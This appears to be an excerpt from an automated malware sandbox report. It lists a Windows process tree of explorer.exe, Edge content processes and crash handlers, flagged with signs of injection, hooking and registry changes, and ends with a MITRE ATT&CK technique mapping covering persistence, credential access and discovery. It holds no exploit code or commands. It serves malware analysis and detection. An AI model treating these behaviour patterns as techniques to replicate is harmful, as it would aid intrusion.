C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6828

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1656

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4700

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5896

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4876

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5336 -s 868
2⤵
- Program crash
PID:8268

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Drops file in Windows directory
PID:5516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:6216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4732

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6984

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8856

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2700

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2700 -s 1484
2⤵
- Program crash
PID:7924

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6832

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8448

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9864

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7424

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7008

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7224

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5592

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8448

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8448 -s 1424
2⤵
- Program crash
PID:5220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9732

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 9732 -s 2796
2⤵
- Program crash
PID:6932

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4884

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:5220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8544

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8544 -s 1564
2⤵
- Program crash
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9352

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

System Information Discovery

Security Software Discovery

T1063

Peripheral Device Discovery